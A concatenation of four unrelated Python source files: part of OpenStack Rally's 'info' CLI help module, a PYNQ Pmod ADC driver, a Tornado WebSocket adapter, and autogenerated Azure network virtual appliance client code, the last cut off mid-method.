info = self._find_info(query)
if info:
print(info)
else:
substitutions = self._find_substitution(query)
if len(substitutions) == 1:
print(self._find_info(substitutions[0]))
else:
print("Failed to find any docs for query: '%s'" % query)
if substitutions:
print("Did you mean one of these?\n\t%s" %
"\n\t".join(substitutions))
return 1
def list(self):
"""List main entities in Rally for which rally info find works.
Lists benchmark scenario groups, deploy engines and server providers.
"""
self.BenchmarkScenarios()
self.SLA()
self.DeploymentEngines()
self.ServerProviders()
def BenchmarkScenarios(self):
"""Get information about benchmark scenarios available in Rally."""
def scenarios_filter(scenario_cls):
return any(scenario_base.Scenario.is_scenario(scenario_cls, m)
for m in dir(scenario_cls))
scenarios = self._get_descriptions(scenario_base.Scenario,
scenarios_filter)
info = (self._make_header("Rally - Benchmark scenarios") +
"\n\n"
"Benchmark scenarios are what Rally actually uses to test "
"the performance of an OpenStack deployment.\nEach Benchmark "
"scenario implements a sequence of atomic operations "
"(server calls) to simulate\ninteresing user/operator/"
"client activity in some typical use case, usually that of "
"a specific OpenStack\nproject. Iterative execution of this "
"sequence produces some kind of load on the target cloud.\n"
"Benchmark scenarios play the role of building blocks in "
"benchmark task configuration files."
"\n\n"
"Scenarios in Rally are put together in groups. Each "
"scenario group is concentrated on some specific \nOpenStack "
"functionality. For example, the 'NovaServers' scenario "
"group contains scenarios that employ\nseveral basic "
"operations available in Nova."
"\n\n" +
self._compose_table("List of Benchmark scenario groups",
scenarios) +
"To get information about benchmark scenarios inside "
"each scenario group, run:\n"
" $ rally info find <ScenarioGroupName>\n\n")
print(info)
def SLA(self):
"""Get information about SLA available in Rally."""
sla = self._get_descriptions(sla_base.SLA)
# NOTE(msdubov): Add config option names to the "Name" column
for i in range(len(sla)):
description = sla[i]
sla_cls = sla_base.SLA.get_by_name(description[0])
sla[i] = (sla_cls.OPTION_NAME, description[1])
info = (self._make_header("Rally - SLA checks "
"(Service-Level Agreements)") +
"\n\n"
"SLA in Rally enable quick and easy checks of "
"whether the results of a particular\nbenchmark task have "
"passed certain success criteria."
"\n\n"
"SLA checks can be configured in the 'sla' section of "
"benchmark task configuration\nfiles, used to launch new "
"tasks by the 'rally task start <config_file>' command.\n"
"For each SLA check you would like to use, you should put "
"its name as a key and the\ntarget check parameter as an "
"assosiated value, e.g.:\n\n"
" sla:\n"
" max_seconds_per_iteration: 4\n"
" failure_rate:\n"
" max: 1"
"\n\n" +
self._compose_table("List of SLA checks", sla) +
"To get information about specific SLA checks, run:\n"
" $ rally info find <sla_check_name>\n")
print(info)
def DeploymentEngines(self):
"""Get information about deploy engines available in Rally."""
engines = self._get_descriptions(deploy.EngineFactory)
info = (self._make_header("Rally - Deployment engines") +
"\n\n"
"Rally is an OpenStack benchmarking system. Before starting "
"benchmarking with Rally,\nyou obviously have either to "
"deploy a new OpenStack cloud or to register an existing\n"
"one in Rally. Deployment engines in Rally are essentially "
"plugins that control the\nprocess of deploying some "
"OpenStack distribution, say, with DevStack or FUEL, and\n"
"register these deployments in Rally before any benchmarking "
"procedures against them\ncan take place."
"\n\n"
"A typical use case in Rally would be when you first "
"register a deployment using the\n'rally deployment create' "
"command and then reference this deployment by uuid "
"when\nstarting a benchmark task with 'rally task start'. "
"The 'rally deployment create'\ncommand awaits a deployment "
"configuration file as its parameter. This file may look "
"like:\n"
"{\n"
" \"type\": \"ExistingCloud\",\n"
" \"auth_url\": \"http://example.net:5000/v2.0/\",\n"
" \"admin\": { <credentials> },\n"
" ...\n"
"}"
"\n\n" +
self._compose_table("List of Deployment engines", engines) +
"To get information about specific Deployment engines, run:\n"
" $ rally info find <DeploymentEngineName>\n")
print(info)
def ServerProviders(self):
"""Get information about server providers available in Rally."""
providers = self._get_descriptions(serverprovider.ProviderFactory)
info = (self._make_header("Rally - Server providers") +
"\n\n"
"Rally is an OpenStack benchmarking system. Before starting "
"benchmarking with Rally,\nyou obviously have either to "
"deploy a new OpenStack cloud or to register an existing\n"
"one in Rally with one of the Deployment engines. These "
"deployment engines, in turn,\nmay need Server "
"providers to manage virtual machines used for "
"OpenStack deployment\nand its following benchmarking. The "
"key feature of server providers is that they\nprovide a "
"unified interface for interacting with different "
"virtualization\ntechnologies (LXS, Virsh etc.)."
"\n\n"
"Server providers are usually referenced in deployment "
"configuration files\npassed to the 'rally deployment create'"
" command, e.g.:\n"
"{\n"
" \"type\": \"DevstackEngine\",\n"
" \"provider\": {\n"
" \"type\": \"ExistingServers\",\n"
" \"credentials\": [{\"user\": \"root\",\n"
" \"host\": \"10.2.0.8\"}]\n"
" }\n"
"}"
"\n\n" +
self._compose_table("List of Server providers", providers) +
"To get information about specific Server providers, run:\n"
" $ rally info find <ServerProviderName>\n")
print(info)
def _get_descriptions(self, base_cls, subclass_filter=None):
descriptions = []
subclasses = utils.itersubclasses(base_cls)
if subclass_filter:
subclasses = filter(subclass_filter, subclasses)
for entity in subclasses:
name = entity.__name__
doc = utils.parse_docstring(entity.__doc__)
description = doc["short_description"] or ""
descriptions.append((name, description))
descriptions.sort(key=lambda d: d[0])
return descriptions
def _find_info(self, query):
return (self._get_scenario_group_info(query) or
self._get_scenario_info(query) or
self._get_sla_info(query) or
self._get_deploy_engine_info(query) or
self._get_server_provider_info(query))
def _find_substitution(self, query):
max_distance = min(3, len(query) / 4)
scenarios = scenario_base.Scenario.list_benchmark_scenarios()
scenario_groups = list(set(s.split(".")[0] for s in scenarios))
scenario_methods = list(set(s.split(".")[1] for s in scenarios))
sla_info = [cls.__name__ for cls in utils.itersubclasses(
sla_base.SLA)]
sla_info.extend([cls.OPTION_NAME for cls in utils.itersubclasses(
sla_base.SLA)])
deploy_engines = [cls.__name__ for cls in utils.itersubclasses(
deploy.EngineFactory)]
server_providers = [cls.__name__ for cls in utils.itersubclasses(
serverprovider.ProviderFactory)]
candidates = (scenarios + scenario_groups + scenario_methods +
sla_info + deploy_engines + server_providers)
suggestions = []
# NOTE(msdubov): Incorrect query may either have typos or be truncated.
for candidate in candidates:
if ((utils.distance(query, candidate) <= max_distance or
candidate.startswith(query))):
suggestions.append(candidate)
return suggestions
def _get_scenario_group_info(self, query):
try:
scenario_group = scenario_base.Scenario.get_by_name(query)
if not any(scenario_base.Scenario.is_scenario(scenario_group, m)
for m in dir(scenario_group)):
return None
info = self._make_header("%s (benchmark scenario group)" %
scenario_group.__name__)
info += "\n\n"
info += utils.format_docstring(scenario_group.__doc__)
scenarios = scenario_group.list_benchmark_scenarios()
descriptions = []
for scenario_name in scenarios:
cls, method_name = scenario_name.split(".")
if hasattr(scenario_group, method_name):
scenario = getattr(scenario_group, method_name)
doc = utils.parse_docstring(scenario.__doc__)
descr = doc["short_description"] or ""
descriptions.append((scenario_name, descr))
info += self._compose_table("Benchmark scenarios", descriptions)
return info
except exceptions.NoSuchScenario:
return None
def _get_scenario_info(self, query):
try:
scenario = scenario_base.Scenario.get_scenario_by_name(query)
scenario_group_name = utils.get_method_class(scenario).__name__
header = ("%(scenario_group)s.%(scenario_name)s "
"(benchmark scenario)" %
{"scenario_group": scenario_group_name,
"scenario_name": scenario.__name__})
info = self._make_header(header)
info += "\n\n"
doc = utils.parse_docstring(scenario.__doc__)
if not doc["short_description"]:
return None
info += doc["short_description"] + "\n\n"
if doc["long_description"]:
info += doc["long_description"] + "\n\n"
if doc["params"]:
info += "Parameters:\n"
for param in doc["params"]:
info += " - %(name)s: %(doc)s" % param + "\n"
if doc["returns"]:
info += "Returns: %s" % doc["returns"]
return info
except exceptions.NoSuchScenario:
return None
def _get_sla_info(self, query):
try:
sla = sla_base.SLA.get_by_name(query)
header = "%s (SLA)" % sla.OPTION_NAME
info = self._make_header(header)
info += "\n\n"
info += utils.format_docstring(sla.__doc__) + "\n"
return info
except exceptions.NoSuchSLA:
return None
def _get_deploy_engine_info(self, query):
try:
deploy_engine = deploy.EngineFactory.get_by_name(query)
header = "%s (deploy engine)" % deploy_engine.__name__
info = self._make_header(header)
info += "\n\n"
info += utils.format_docstring(deploy_engine.__doc__)
return info
except exceptions.NoSuchEngine:
return None
def _get_server_provider_info(self, query):
try:
server_provider = serverprovider.ProviderFactory.get_by_name(query)
header = "%s (server provider)" % server_provider.__name__
info = self._make_header(header)
info += "\n\n"
info += utils.format_docstring(server_provider.__doc__)
return info
except exceptions.NoSuchVMProvider:
return None
def _make_header(self, string):
header = "-" * (len(string) + 2) + "\n"
header += " " + string + " \n"
header += "-" * (len(string) + 2)
return header
def _compose_table(self, title, descriptions):
table = " " + title + ":\n"
len0 = lambda x: len(x[0])
len1 = lambda x: len(x[1])
first_column_len = max(map(len0, descriptions)) + cliutils.MARGIN
second_column_len = max(map(len1, descriptions)) + cliutils.MARGIN
table += "-" * (first_column_len + second_column_len + 1) + "\n"
table += (" Name" + " " * (first_column_len - len("Name")) +
"Description\n")
table += "-" * (first_column_len + second_column_len + 1) + "\n"
for (name, descr) in descriptions:
table += " " + name
table += " " * (first_column_len - len(name))
table += descr + "\n"
table += "-" * (first_column_len + second_column_len + 1) + "\n"
table += "\n"
return table
|
|
# Copyright (c) 2016-2020, Xilinx, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION). HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import struct
from math import ceil
from . import Pmod
from . import MAILBOX_OFFSET
__author__ = "Graham Schelle, Giuseppe Natale, Yun Rock Qu"
__copyright__ = "Copyright 2016-2020, Xilinx"
__email__ = "pynq_support@xilinx.com"
PMOD_ADC_PROGRAM = "pmod_adc.bin"
PMOD_ADC_LOG_START = MAILBOX_OFFSET+16
PMOD_ADC_LOG_END = PMOD_ADC_LOG_START+(1008*4)
RESET_ADC = 0x1
READ_RAW_DATA = 0x3
READ_VOLTAGE = 0x5
READ_AND_LOG_RAW_DATA = 0x7
READ_AND_LOG_VOLTAGE = 0x9
def _reg2float(reg):
"""Converts 32-bit register value to floats in Python.
Parameters
----------
reg: int
A 32-bit register value read from the mailbox.
Returns
-------
float
A float number translated from the register value.
"""
s = struct.pack('>l', reg)
return round(struct.unpack('>f', s)[0], 4)
class Pmod_ADC(object):
"""This class controls an Analog to Digital Converter Pmod.
The Pmod AD2 (PB 200-217) is an analog-to-digital converter powered by
AD7991. Users may configure up to 4 conversion channels at 12 bits of
resolution.
Attributes
----------
microblaze : Pmod
Microblaze processor instance used by this module.
log_running : int
The state of the log (0: stopped, 1: started).
"""
def __init__(self, mb_info):
"""Return a new instance of an ADC object.
Parameters
----------
mb_info : dict
A dictionary storing Microblaze information, such as the
IP name and the reset name.
"""
self.microblaze = Pmod(mb_info, PMOD_ADC_PROGRAM)
self.log_running = 0
def reset(self):
"""Reset the ADC.
Returns
-------
None
"""
self.microblaze.write_blocking_command(RESET_ADC)
def read_raw(self, ch1=1, ch2=0, ch3=0):
"""Get the raw value from the Pmod ADC.
When ch1, ch2, and ch3 values are 1 then the corresponding channel
is included.
For each channel selected, this method reads and returns one sample.
Note
----
The 4th channel is not available due to the jumper (JP1) setting on
ADC.
Note
----
This method reads the raw value from ADC.
Parameters
----------
ch1 : int
1 means include channel 1, 0 means do not include.
ch2 : int
1 means include channel 2, 0 means do not include.
ch3 : int
1 means include channel 3, 0 means do not include.
Returns
-------
list
The raw values read from the 3 channels of the Pmod ADC.
"""
if ch1 not in range(2):
raise ValueError("Valid value for ch1 is 0 or 1.")
if ch2 not in range(2):
raise ValueError("Valid value for ch2 is 0 or 1.")
if ch3 not in range(2):
raise ValueError("Valid value for ch3 is 0 or 1.")
cmd = (ch3 << 6) | (ch2 << 5) | (ch1 << 4) | READ_RAW_DATA
# Send the command
self.microblaze.write_blocking_command(cmd)
# Read the samples from ADC
readings = self.microblaze.read_mailbox(0, 3)
results = []
if ch1:
results.append(readings[0])
if ch2:
results.append(readings[1])
if ch3:
results.append(readings[2])
return results
def read(self, ch1=1, ch2=0, ch3=0):
"""Get the voltage from the Pmod ADC.
When ch1, ch2, and ch3 values are 1 then the corresponding channel
is included.
For each channel selected, this method reads and returns one sample.
Note
----
The 4th channel is not available due to the jumper setting on ADC.
Note
----
This method reads the voltage values from ADC.
Parameters
----------
ch1 : int
1 means include channel 1, 0 means do not include.
ch2 : int
1 means include channel 2, 0 means do not include.
ch3 : int
1 means include channel 3, 0 means do not include.
Returns
-------
list
The voltage values read from the 3 channels of the Pmod ADC.
"""
if ch1 not in range(2):
raise ValueError("Valid value for ch1 is 0 or 1.")
if ch2 not in range(2):
raise ValueError("Valid value for ch2 is 0 or 1.")
if ch3 not in range(2):
raise ValueError("Valid value for ch3 is 0 or 1.")
cmd = (ch3 << 6) | (ch2 << 5) | (ch1 << 4) | READ_VOLTAGE
# Send the command
self.microblaze.write_blocking_command(cmd)
# Read the last sample from ADC
readings = self.microblaze.read_mailbox(0, 3)
results = []
if ch1:
results.append(_reg2float(readings[0]))
if ch2:
results.append(_reg2float(readings[1]))
if ch3:
results.append(_reg2float(readings[2]))
return results
def start_log_raw(self, ch1=1, ch2=0, ch3=0, log_interval_us=100):
"""Start the log of raw values with the interval specified.
This parameter `log_interval_us` can set the time interval between
two samples, so that users can read out multiple values in a single
log.
Parameters
----------
ch1 : int
1 means include channel 1, 0 means do not include.
ch2 : int
1 means include channel 2, 0 means do not include.
ch3 : int
1 means include channel 3, 0 means do not include.
log_interval_us : int
The length of the log in milliseconds, for debug only.
Returns
-------
None
"""
if log_interval_us < 0:
raise ValueError("Time between samples should be no less than 0.")
if ch1 not in range(2):
raise ValueError("Valid value for ch1 is 0 or 1.")
if ch2 not in range(2):
raise ValueError("Valid value for ch2 is 0 or 1.")
if ch3 not in range(2):
raise ValueError("Valid value for ch3 is 0 or 1.")
cmd = (ch3 << 6) | (ch2 << 5) | (ch1 << 4) | READ_AND_LOG_RAW_DATA
self.log_running = 1
# Send log interval
self.microblaze.write_mailbox(0, log_interval_us)
# Send the command
self.microblaze.write_non_blocking_command(cmd)
def start_log(self, ch1=1, ch2=0, ch3=0, log_interval_us=100):
"""Start the log of voltage values with the interval specified.
This parameter `log_interval_us` can set the time interval between
two samples, so that users can read out multiple values in a single
log.
Parameters
----------
ch1 : int
1 means include channel 1, 0 means do not include.
ch2 : int
1 means include channel 2, 0 means do not include.
ch3 : int
1 means include channel 3, 0 means do not include.
log_interval_us : int
The length of the log in milliseconds, for debug only.
Returns
-------
None
"""
if log_interval_us < 0:
raise ValueError("Time between samples should be no less than 0.")
if ch1 not in range(2):
raise ValueError("Valid value for ch1 is 0 or 1.")
if ch2 not in range(2):
raise ValueError("Valid value for ch2 is 0 or 1.")
if ch3 not in range(2):
raise ValueError("Valid value for ch3 is 0 or 1.")
cmd = (ch3 << 6) | (ch2 << 5) | (ch1 << 4) | READ_AND_LOG_VOLTAGE
self.log_running = 1
# Send log interval
self.microblaze.write_mailbox(0, log_interval_us)
# Send the command
self.microblaze.write_non_blocking_command(cmd)
def stop_log_raw(self):
"""Stop the log of raw values.
This is done by sending the reset command to IOP. There is no need to
wait for the IOP.
Returns
-------
None
"""
if self.log_running == 1:
self.microblaze.write_non_blocking_command(RESET_ADC)
self.log_running = 0
else:
raise RuntimeError("No grove ADC log running.")
def stop_log(self):
"""Stop the log of voltage values.
This is done by sending the reset command to IOP. There is no need to
wait for the IOP.
Returns
-------
None
"""
if self.log_running == 1:
self.microblaze.write_non_blocking_command(RESET_ADC)
self.log_running = 0
else:
raise RuntimeError("No grove ADC log running.")
def get_log_raw(self):
"""Get the log of raw values.
First stop the log before getting the log.
Returns
-------
list
List of raw samples from the ADC.
"""
# Stop logging
self.stop_log_raw()
# Prep iterators and results list
[head_ptr, tail_ptr] = self.microblaze.read_mailbox(0x8, 2)
readings = list()
# Sweep circular buffer for samples
if head_ptr == tail_ptr:
return None
elif head_ptr < tail_ptr:
num_words = int(ceil((tail_ptr - head_ptr) / 4))
data = self.microblaze.read(head_ptr, num_words)
readings += data
else:
num_words = int(ceil((PMOD_ADC_LOG_END - head_ptr) / 4))
data = self.microblaze.read(head_ptr, num_words)
readings += data
num_words = int(ceil((tail_ptr - PMOD_ADC_LOG_START) / 4))
data = self.microblaze.read(PMOD_ADC_LOG_START, num_words)
readings += data
return readings
def get_log(self):
"""Get the log of voltage values.
First stop the log before getting the log.
Returns
-------
list
List of voltage samples from the ADC.
"""
# Stop logging
self.stop_log()
# Prep iterators and results list
[head_ptr, tail_ptr] = self.microblaze.read_mailbox(0x8, 2)
readings = list()
# Sweep circular buffer for samples
if head_ptr == tail_ptr:
return None
elif head_ptr < tail_ptr:
num_words = int(ceil((tail_ptr - head_ptr) / 4))
data = self.microblaze.read(head_ptr, num_words)
readings += [_reg2float(i) for i in data]
else:
num_words = int(ceil((PMOD_ADC_LOG_END - head_ptr) / 4))
data = self.microblaze.read(head_ptr, num_words)
readings += [_reg2float(i) for i in data]
num_words = int(ceil((tail_ptr - PMOD_ADC_LOG_START) / 4))
data = self.microblaze.read(PMOD_ADC_LOG_START, num_words)
readings += [_reg2float(i) for i in data]
return readings
|
|
#-*- coding: utf-8 -*-
import json
import hashlib
import base64
import traceback
from threading import Thread, Event
from Queue import Queue, Empty
from defs import *
try:
import tornado
from tornado.iostream import StreamClosedError
except ImportError:
tornado = None
StreamClosedError = None
class TornadoWebSocketAdapter(object):
def __init__(self, environ, app, request):
self.environ = environ
self.app = app
self.request = request
self.evt_close = threading.Event()
self.f = None
self.q_recv = None
self.threads = []
def html(self):
f = self.request.connection.detach()
if f:
resp = ['HTTP/1.1 403 handshake fail', '', '']
f.write('\r\n'.join(resp))
f.close()
return self
def fail(self):
f = self.request.connection.detach()
if f:
resp = ['HTTP/1.1 400 handshake fail', '', '']
f.write('\r\n'.join(resp))
f.close()
return self
def handshake(self):
request = self.request
headers = request.headers
h_upgrade = headers.get('upgrade', '').lower()
h_connection = headers.get('connection', '').lower()
h_connection = h_connection.split(',')
h_connection = [c.strip() for c in h_connection if c.strip()]
h_key = headers.get('sec-websocket-key', '')
if h_upgrade != 'websocket':
self.fail()
return
elif 'upgrade' not in h_connection:
self.fail()
return
elif not h_key:
self.fail()
return
# -- handshake
protocol = headers.get('sec-websocket-protocol', '')
version = headers.get('sec-websocket-version', '')
key_hash = '%s%s' % (h_key, ws_uid)
key_hash = base64.b64encode(hashlib.sha1(key_hash).digest())
_headers = [('upgrade', 'websocket'),
('connection', 'upgrade'),
('sec-websocket-accept', key_hash),
('x-handshake-by', 'TornadoWebSocketAdapter'),]
f = request.connection.detach()
self.f = f
f.set_close_callback(self.on_connection_close)
resp = ['HTTP/1.1 101 Switching protocols']
resp.extend([': '.join(h) for h in _headers])
resp.extend(['', ''])
f.write('\r\n'.join(resp))
# f.write(make_frame(1, OP_PING, ''))
# f.write(make_frame(1, OP_TEXT, 'hello from tornado!'))
return True
# --------------------
# for flask view
# --------------------
def handle(self, handler, values):
self.q_recv = Queue()
f = self.f
th = threading.Thread(target=self._recv,
args=(f,))
th.setDaemon(True)
th.start()
pid = os.getpid()
tid = th.ident
th.setName('ws-%s-handle-recv-%s' % (pid, tid));
th_h = threading.Thread(target=self._handler,
args=(handler, values))
th_h.setDaemon(True)
th_h.start()
tid = th_h.ident
th_h.setName('ws-%s-handler-%s' % (pid, tid));
self.threads.append(th)
self.threads.append(th_h)
return self
def _handler(self, handler, values):
try:
handler(self, values)
except Exception, e:
logging.error('_handler -> handler()')
logging.error(traceback.format_exc(e))
self._abort()
def _recv(self, f):
while not self.evt_close.is_set():
frame = None
try:
frame = parse_frame(f)
except (StreamClosedError, WsIOError):
break
except WsClosedByRemote:
break
except Exception, e:
logging.error('_recv -> parse_frame(f)')
logging.error(traceback.format_exc(e))
break
if not frame:
continue
self.q_recv.put(frame)
self._abort()
def recv(self, timeout=5.0):
if self.evt_close.is_set():
return
t0 = time.time()
while not self.evt_close.is_set():
try:
frame = self.q_recv.get(True, 0.1)
if frame:
return frame
if t0 + timeout > time.time():
return
except Empty:
pass
# --------------------
# for server class
# --------------------
def server(self, server):
pid = os.getpid()
th = threading.Thread(target=self._recv_for_server,
args=(self.f, server))
th.setDaemon(True)
th.start()
tid = th.ident
th.setName('ws-%s-server-recv-%s' % (pid, tid))
# self.threads.append(th)
return self
def _recv_for_server(self, f, server):
self._safe_invoke(server, 'on_open', self)
while not self.evt_close.is_set():
frame = None
try:
frame = parse_frame(f)
except (StreamClosedError, WsIOError):
break
except WsClosedByRemote:
break
except Exception, e:
logging.error('_recv_for_server -> parse_frame')
logging.error(traceback.format_exc(e))
break
if not frame:
continue
self._safe_invoke(server, 'on_message', self, frame)
self._safe_invoke(server, 'on_close', self)
self._abort()
# --------------------
def _safe_invoke(self, server, method, *args, **kargs):
if not server or not method:
return
if not hasattr(server, method):
return
try:
getattr(server, method)(*args, **kargs)
except:
logging.error('_safe_invoke: %s()' % method)
logging.error(traceback.format_exc(e))
# --------------------
def send_json(self, v, fin=True, op=OP_TEXT):
if isinstance(v, (unicode, str)):
return self.send(v)
else:
return self.send(json.dumps(v))
def send(self, msg, fin=True, op=OP_TEXT):
if self.evt_close.is_set():
return
frame = make_frame(fin, op, msg or '')
try:
if self.f and not self.f.closed():
self.f.write(frame)
except (StreamClosedError, WsIOError):
self._abort()
except Exception, e:
logging.error('send -> self.f.write(frame)')
logging.error(traceback.format_exc(e))
self._abort()
def close(self):
logging.info('TornadoWebSocketAdapter.close()')
self.send('', op=OP_CLOSE)
self._abort()
def on_connection_close(self):
logging.info('TornadoWebSocketAdapter.on_connection_close()')
self._abort()
def _abort(self):
logging.info('TornadoWebSocketAdapter._abort(): start to clean up')
if not self.evt_close.is_set():
self.evt_close.set()
if self.f:
try:
if not self.f.closed():
self.f.close()
except Exception, e:
logging.warn('_abort -> self.f.close()')
logging.warn(traceback.format_exc(e))
self.f = None
try:
curr_th = threading.current_thread()
while self.threads:
th = self.threads.pop()
if not th:
continue
if th == curr_th:
continue
if th.is_alive():
pass
th.join()
except IndexError:
pass
logging.info('TornadoWebSocketAdapter._abort(): done cleanning.')
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class NetworkVirtualAppliancesOperations(object):
"""NetworkVirtualAppliancesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_03_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
network_virtual_appliance_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkVirtualApplianceName': self._serialize.url("network_virtual_appliance_name", network_virtual_appliance_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkVirtualAppliances/{networkVirtualApplianceName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
network_virtual_appliance_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified Network Virtual Appliance.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_virtual_appliance_name: The name of Network Virtual Appliance.
:type network_virtual_appliance_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
network_virtual_appliance_name=network_virtual_appliance_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkVirtualApplianceName': self._serialize.url("network_virtual_appliance_name", network_virtual_appliance_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkVirtualAppliances/{networkVirtualApplianceName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
network_virtual_appliance_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "_models.NetworkVirtualAppliance"
"""Gets the specified Network Virtual Appliance.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_virtual_appliance_name: The name of Network Virtual Appliance.
:type network_virtual_appliance_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkVirtualAppliance, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_03_01.models.NetworkVirtualAppliance
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NetworkVirtualAppliance"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkVirtualApplianceName': self._serialize.url("network_virtual_appliance_name", network_virtual_appliance_name, 'str'),
